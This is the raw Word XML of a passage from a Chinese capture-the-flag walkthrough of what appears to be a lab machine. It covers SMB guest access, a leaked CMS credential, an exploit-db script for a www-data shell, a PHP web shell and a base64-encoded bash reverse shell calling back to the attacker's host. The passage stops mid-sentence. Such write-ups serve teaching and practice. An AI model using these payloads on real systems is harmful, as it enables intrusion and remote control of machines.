          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> \\\\192.168.6.173\\DebianShare -U guest</w:t>
      </w:r>
      <w:r w:rsidR="00E743E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，要求我们输密码，这里是以</w:t>
      </w:r>
      <w:r w:rsidR="00E743E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidR="00E743E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>游客身份访问，大概率不需要密码，直接回车</w:t>
      </w:r>
      <w:r w:rsidR="00CB71AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB71AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB71AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看当前</w:t>
      </w:r>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录下文件，发现存在一个文件</w:t>
      </w:r>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>configz.zip</w:t>
      </w:r>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，下载到本地方便查看，输入</w:t>
      </w:r>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get configz.zip</w:t>
      </w:r>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，会下载到打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E278B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时的目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FABF375" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00902319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31131C6" wp14:editId="6EB79E5E">
            <wp:extent cx="5274310" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="26346103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61031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F76E" w14:textId="36835B3E" w:rsidR="00902319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13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E0B33" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00FB0AE1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07FFF59" wp14:editId="1250A95C">
            <wp:extent cx="4210050" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="114631961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19615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0D9" w14:textId="13D2C9B6" w:rsidR="00FB0AE1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14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78575F" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00CB71AE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C29F7E6" wp14:editId="45B585F0">
            <wp:extent cx="5274310" cy="1142365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="434104912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04912" name="图片 1" descr="图片包含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1785" w14:textId="054C03F7" w:rsidR="00CB71AE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15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBB0EB" w14:textId="5B45D7A6" w:rsidR="00CE3F10" w:rsidRDefault="00CE3F10" w:rsidP="00902319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解压缩该文件，输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>unzip configz.zip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="00616FCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进入该文件查看这</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00616FCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类似是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00616FCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00616FCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的安装程序</w:t>
      </w:r>
      <w:r w:rsidR="004E4704">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，用</w:t>
      </w:r>
      <w:r w:rsidR="004E4704">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -r </w:t>
      </w:r>
      <w:r w:rsidR="00F807F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="004E4704">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>过滤一下，看是否存在敏感信息。</w:t>
      </w:r>
      <w:r w:rsidR="00BA28E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现了</w:t>
      </w:r>
      <w:r w:rsidR="00BA28E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin:jojo1989</w:t>
      </w:r>
      <w:r w:rsidR="00BA28E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这对用户名和密码，尝试登录一下</w:t>
      </w:r>
      <w:r w:rsidR="008568C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CMS</w:t>
      </w:r>
      <w:r w:rsidR="008568C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网站，</w:t>
      </w:r>
      <w:r w:rsidR="002F6B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEE7D6" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00616FCF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0C5F585" wp14:editId="05591620">
            <wp:extent cx="3219450" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4484869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8691" name="图片 1" descr="手机屏幕的截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75BC" w14:textId="5F36F11B" w:rsidR="00616FCF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16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F89DC" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00BA28E4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B68E79A" wp14:editId="7F301962">
            <wp:extent cx="5274310" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="155714003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40030" name="图片 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5332" w14:textId="3E82B35E" w:rsidR="00F807F2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17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF803E" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="002F6B3B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4BCFA64" wp14:editId="6EBA5A56">
            <wp:extent cx="5274310" cy="2264410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="186201064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10641" name="图片 1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A1CA" w14:textId="50BBE24D" w:rsidR="002F6B3B" w:rsidRPr="00902319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18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7AAF2C" w14:textId="1DD6177D" w:rsidR="004B64B4" w:rsidRDefault="00BE13A6" w:rsidP="00BE13A6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E13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实施攻击</w:t>
      </w:r>
      <w:r w:rsidR="00440B55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-</w:t>
      </w:r>
      <w:r w:rsidR="00440B55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获取</w:t>
      </w:r>
      <w:r w:rsidR="00440B55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www-data shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5ECC8" w14:textId="15FC1081" w:rsidR="00FB3EBE" w:rsidRDefault="009E153C" w:rsidP="009E153C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</w:t>
      </w:r>
      <w:r w:rsidR="00FA1ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA1ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>searchslpoit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA1ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中找到的漏洞利用脚本，输入</w:t>
      </w:r>
      <w:r w:rsidR="00F8190B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00F8190B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="00F8190B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中下载该文件，输入命令</w:t>
      </w:r>
      <w:r w:rsidR="00FA4CED" w:rsidRPr="00FA4CED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>python3 /usr/share/exploitdb/exploits/php/webapps/49876.py -u 'http://adria.hmv/panel/' -l 'admin' -p 'jojo1989'</w:t>
      </w:r>
      <w:r w:rsidR="00EB5B2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="001A7CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>成功获得</w:t>
      </w:r>
      <w:r w:rsidR="001A7CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="001A7CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC441D" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="001A7CF6" w:rsidP="00A96360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5291E838" wp14:editId="32A41286">
            <wp:extent cx="5274310" cy="1779270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="178769875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98753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22F5" w14:textId="3A7CB0B3" w:rsidR="00EB5B2F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19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20D418" w14:textId="7DEE8124" w:rsidR="00270AAD" w:rsidRDefault="00270AAD" w:rsidP="00A96360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EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为便于交互，生成一个反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="003352A5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，输入命令</w:t>
      </w:r>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> system(\$_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;" &gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E1865" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell.phar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后在</w:t>
      </w:r>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0081409E" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7777</w:t>
      </w:r>
      <w:r w:rsidR="0081409E" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r w:rsidR="0081409E" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7777</w:t>
      </w:r>
      <w:r w:rsidR="0081409E" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口，</w:t>
      </w:r>
      <w:r w:rsidR="00A766D5" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后在浏览器中输入</w:t>
      </w:r>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.173/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell.phar?cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=echo "YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC42LjE0OS83Nzc3ICAwPiYx"  |base64 -d |bash</w:t>
      </w:r>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTkyLjE2OC42LjE0OS83Nzc3ICAwPiYx</w:t>
      </w:r>
      <w:r w:rsidR="00EA5AAA" w:rsidRPr="00EA5AAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="000826C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000826C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000826C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000826C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000826C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/192.168.6.149/7777  0&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>编码（注意</w:t>
      </w:r>
      <w:r w:rsidR="002072C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
